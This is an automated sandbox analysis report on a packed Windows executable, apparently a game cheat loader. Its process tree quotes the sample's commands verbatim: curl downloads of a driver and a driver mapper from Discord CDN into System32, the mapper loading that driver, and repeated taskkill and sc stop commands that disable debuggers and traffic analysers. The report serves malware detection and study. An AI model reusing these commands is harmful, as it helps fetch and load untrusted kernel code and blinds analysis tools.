Analysis

  • max time kernel
    20s
  • max time network
    34s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-03-2023 14:02

General

  • Target

    NeptnExternalFree.exe

  • Size

    3.5MB

  • MD5

    c99af5bbdb0b7696677840071616a258

  • SHA1

    e7b768d41758cbf69c5a0c04faea4401059549a5

  • SHA256

    995ee8dd588a42770bc31ccfd09d7dc6d5b37896f5d8f0ffafe95e3a8aa088bb

  • SHA512

    56874951847161810250540fb34dd671556a258236078c159c55fb3f1351ae97e817ef23b06ca62f07e73a2fc79baf678f0bc396718e3c3bb21d3842c964fdef

  • SSDEEP

    98304:5Wi11EuYWF9XDGLjgc0/mBZarnsEpjW18Hf5F1Gt:5Wq3YWbGIc0ggZW0RFc

Malware Config

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 1 IoCs
  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Launches sc.exe 20 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 64 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 29 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NeptnExternalFree.exe
    "C:\Users\Admin\AppData\Local\Temp\NeptnExternalFree.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of WriteProcessMemory
    PID:1984
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start https://discord.gg/xCRS6yyPF6
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2176
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/xCRS6yyPF6
        3⤵
        • Enumerates system info in registry
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:5084
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7ffa2b1546f8,0x7ffa2b154708,0x7ffa2b154718
          4⤵
            PID:3680
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4890688365769905590,5940076846082171707,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
            4⤵
              PID:5044
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,4890688365769905590,5940076846082171707,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:4824
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,4890688365769905590,5940076846082171707,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2712 /prefetch:8
              4⤵
                PID:3664
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4890688365769905590,5940076846082171707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3660 /prefetch:1
                4⤵
                  PID:4752
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4890688365769905590,5940076846082171707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
                  4⤵
                    PID:3496
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4890688365769905590,5940076846082171707,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
                    4⤵
                      PID:640
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/879146399290241105/1070367957353500782/NeptnDriver.sys --output C:\Windows\System32\NeptnDriver.sys >nul 2>&1
                  2⤵
                    PID:1792
                    • C:\Windows\system32\curl.exe
                      curl https://cdn.discordapp.com/attachments/879146399290241105/1070367957353500782/NeptnDriver.sys --output C:\Windows\System32\NeptnDriver.sys
                      3⤵
                        PID:4184
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
                      2⤵
                        PID:3968
                        • C:\Windows\system32\taskkill.exe
                          taskkill /f /im HTTPDebuggerUI.exe
                          3⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3284
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
                        2⤵
                          PID:1496
                          • C:\Windows\system32\taskkill.exe
                            taskkill /f /im HTTPDebuggerSvc.exe
                            3⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3828
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
                          2⤵
                            PID:4220
                            • C:\Windows\system32\taskkill.exe
                              taskkill /f /im Ida64.exe
                              3⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2572
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/879146399290241105/1057075244617187368/mapper.exe --output C:\Windows\System32\mapper.exe >nul 2>&1
                            2⤵
                              PID:4992
                              • C:\Windows\system32\curl.exe
                                curl https://cdn.discordapp.com/attachments/879146399290241105/1057075244617187368/mapper.exe --output C:\Windows\System32\mapper.exe
                                3⤵
                                • Drops file in System32 directory
                                PID:4796
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
                              2⤵
                                PID:1336
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /f /im OllyDbg.exe
                                  3⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:756
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
                                2⤵
                                  PID:4260
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /f /im Dbg64.exe
                                    3⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3968
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
                                  2⤵
                                    PID:4140
                                    • C:\Windows\system32\taskkill.exe
                                      taskkill /f /im Dbg32.exe
                                      3⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1232
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                    2⤵
                                      PID:3356
                                      • C:\Windows\system32\sc.exe
                                        sc stop HTTPDebuggerPro
                                        3⤵
                                        • Drops file in System32 directory
                                        • Launches sc.exe
                                        PID:4184
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                      2⤵
                                        PID:2776
                                        • C:\Windows\system32\taskkill.exe
                                          taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                          3⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1436
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                        2⤵
                                          PID:4432
                                          • C:\Windows\system32\taskkill.exe
                                            taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                            3⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4980
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                                          2⤵
                                            PID:2192
                                            • C:\Windows\system32\taskkill.exe
                                              taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                              3⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1968
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
                                            2⤵
                                              PID:2504
                                              • C:\Windows\system32\taskkill.exe
                                                taskkill /f /im HTTPDebuggerUI.exe
                                                3⤵
                                                • Kills process with taskkill
                                                PID:3576
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
                                              2⤵
                                                PID:1864
                                                • C:\Windows\system32\taskkill.exe
                                                  taskkill /f /im HTTPDebuggerSvc.exe
                                                  3⤵
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4108
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                                2⤵
                                                  PID:444
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop HTTPDebuggerPro
                                                    3⤵
                                                    • Launches sc.exe
                                                    PID:2072
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                                  2⤵
                                                    PID:4544
                                                    • C:\Windows\system32\taskkill.exe
                                                      taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2272
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                                    2⤵
                                                      PID:2040
                                                      • C:\Windows\system32\taskkill.exe
                                                        taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                                        3⤵
                                                        • Kills process with taskkill
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1336
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                                                      2⤵
                                                        PID:2612
                                                        • C:\Windows\system32\taskkill.exe
                                                          taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                                          3⤵
                                                          • Kills process with taskkill
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3596
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c C:\Windows\System32\mapper.exe C:\Windows\System32\NeptnDriver.sys
                                                        2⤵
                                                          PID:3964
                                                          • C:\Windows\System32\mapper.exe
                                                            C:\Windows\System32\mapper.exe C:\Windows\System32\NeptnDriver.sys
                                                            3⤵
                                                            • Sets service image path in registry
                                                            • Executes dropped EXE
                                                            • Suspicious behavior: LoadsDriver
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4744
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
                                                          2⤵
                                                            PID:2740
                                                            • C:\Windows\system32\taskkill.exe
                                                              taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
                                                              3⤵
                                                              • Kills process with taskkill
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4848
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
                                                            2⤵
                                                              PID:3204
                                                              • C:\Windows\system32\taskkill.exe
                                                                taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
                                                                3⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3480
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c cls
                                                              2⤵
                                                                PID:4840
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c cls
                                                                2⤵
                                                                  PID:3356
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
                                                                  2⤵
                                                                    PID:3472
                                                                    • C:\Windows\system32\taskkill.exe
                                                                      taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
                                                                      3⤵
                                                                      • Kills process with taskkill
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2596
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
                                                                    2⤵
                                                                      PID:1372
                                                                      • C:\Windows\system32\taskkill.exe
                                                                        taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                                                        3⤵
                                                                        • Kills process with taskkill
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:1884
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
                                                                      2⤵
                                                                        PID:232
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                                                          3⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:1752
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c cls
                                                                        2⤵
                                                                          PID:1860
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
                                                                          2⤵
                                                                            PID:2296
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
                                                                              3⤵
                                                                              • Kills process with taskkill
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:3232
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                                                            2⤵
                                                                              PID:1376
                                                                              • C:\Windows\system32\taskkill.exe
                                                                                taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                                                                3⤵
                                                                                • Kills process with taskkill
                                                                                PID:384
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
                                                                              2⤵
                                                                                PID:1408
                                                                                • C:\Windows\system32\taskkill.exe
                                                                                  taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
                                                                                  3⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:1840
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                                                                2⤵
                                                                                  PID:724
                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                                                                    3⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:4624
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                                                                                  2⤵
                                                                                    PID:772
                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                      taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                                                                      3⤵
                                                                                      • Kills process with taskkill
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3716
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                                                                    2⤵
                                                                                      PID:3496
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        sc stop HTTPDebuggerPro
                                                                                        3⤵
                                                                                        • Launches sc.exe
                                                                                        PID:1692
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
                                                                                      2⤵
                                                                                        PID:1876
                                                                                        • C:\Windows\system32\sc.exe
                                                                                          sc stop HTTPDebuggerProSdk
                                                                                          3⤵
                                                                                          • Launches sc.exe
                                                                                          PID:4988
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
                                                                                        2⤵
                                                                                          PID:4432
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            sc stop KProcessHacker3
                                                                                            3⤵
                                                                                            • Launches sc.exe
                                                                                            PID:2988
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
                                                                                          2⤵
                                                                                            PID:4888
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
                                                                                            2⤵
                                                                                              PID:4460
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                sc stop KProcessHacker1
                                                                                                3⤵
                                                                                                • Launches sc.exe
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:3576
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
                                                                                              2⤵
                                                                                                PID:4780
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  sc stop wireshark
                                                                                                  3⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:1676
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
                                                                                                2⤵
                                                                                                  PID:1016
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /f /im HTTPDebuggerUI.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4156
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
                                                                                                  2⤵
                                                                                                    PID:392
                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                      taskkill /f /im HTTPDebuggerSvc.exe
                                                                                                      3⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:4728
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                                                                                    2⤵
                                                                                                      PID:3284
                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                        sc stop HTTPDebuggerPro
                                                                                                        3⤵
                                                                                                        • Launches sc.exe
                                                                                                        PID:4724
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                                                                                      2⤵
                                                                                                        PID:4992
                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                          taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                                                                                          3⤵
                                                                                                          • Kills process with taskkill
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:4364
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                                                                                        2⤵
                                                                                                          PID:4368
                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                            taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                                                                                            3⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:3868
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c pause >nul 2>&1
                                                                                                          2⤵
                                                                                                            PID:1908
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                                                                                                            2⤵
                                                                                                              PID:1384
                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                                                                                                3⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:424
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
                                                                                                              2⤵
                                                                                                                PID:4196
                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                  taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
                                                                                                                  3⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:5068
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
                                                                                                                2⤵
                                                                                                                  PID:3220
                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
                                                                                                                    3⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    PID:4392
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
                                                                                                                  2⤵
                                                                                                                    PID:4772
                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                      taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
                                                                                                                      3⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:4608
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
                                                                                                                    2⤵
                                                                                                                      PID:2772
                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                        taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                                                                                                        3⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:4220
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq die*" /IM * /F /T >nul 2>&1
                                                                                                                      2⤵
                                                                                                                        PID:4800
                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                          taskkill /FI "IMAGENAME eq die*" /IM * /F /T
                                                                                                                          3⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          PID:1916
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
                                                                                                                        2⤵
                                                                                                                          PID:1700
                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                            taskkill /f /im HTTPDebuggerSvc.exe
                                                                                                                            3⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:384
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebugger.exe >nul 2>&1
                                                                                                                          2⤵
                                                                                                                            PID:4920
                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                              taskkill /f /im HTTPDebugger.exe
                                                                                                                              3⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:1840
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c taskkill /f /im FolderChangesView.exe >nul 2>&1
                                                                                                                            2⤵
                                                                                                                              PID:2044
                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                taskkill /f /im FolderChangesView.exe
                                                                                                                                3⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:4624
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c sc stop HttpDebuggerSdk >nul 2>&1
                                                                                                                              2⤵
                                                                                                                                PID:4752
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc stop HttpDebuggerSdk
                                                                                                                                  3⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:4512
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
                                                                                                                                2⤵
                                                                                                                                  PID:4032
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    sc stop npf
                                                                                                                                    3⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:3832
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
                                                                                                                                  2⤵
                                                                                                                                    PID:2780
                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                      taskkill /f /im HTTPDebuggerUI.exe
                                                                                                                                      3⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:4424
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
                                                                                                                                    2⤵
                                                                                                                                      PID:1720
                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                        taskkill /f /im HTTPDebuggerSvc.exe
                                                                                                                                        3⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:1968
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
                                                                                                                                      2⤵
